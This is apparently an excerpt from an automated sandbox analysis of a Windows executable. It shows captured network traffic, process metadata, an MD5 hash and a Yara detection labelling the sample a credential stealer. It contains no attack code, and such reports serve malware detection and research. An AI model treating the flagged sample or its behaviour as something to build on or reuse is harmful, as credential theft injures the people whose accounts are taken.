                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11263&min_rtt=10237&rtt_var=4717&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1010&delivery_rate=187637&cwnd=227&unsent_bytes=0&cid=16f4f0328ab1ade6&ts=1072&x=0"
2025-03-13 13:58:29 UTC | 61 | IN | Data Raw: 33 37 0d 0a 7b 22 65 72 72 6f 72 22 3a 7b 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 31 2c 22 65 72 72 6f 72 5f 6d 73 67 22 3a 22 64 61 74 61 20 6e 6f 74 20 66 6f 75 6e 64 22 7d 7d 0d 0a
Data Ascii: 37{"error":{"error_code":1,"error_msg":"data not found"}}
2025-03-13 13:58:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0



Target ID: 0
Start time: 09:58:05
Start date: 13/03/2025
Path: C:\Users\user\Desktop\nvtoaldlrg.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\nvtoaldlrg.exe"
Imagebase: 0xac0000
File size: 1'311'232 bytes
MD5 hash: 4A0C3D026246920F6B8BD466CC5FDD8C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.921555375.000000000147F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true
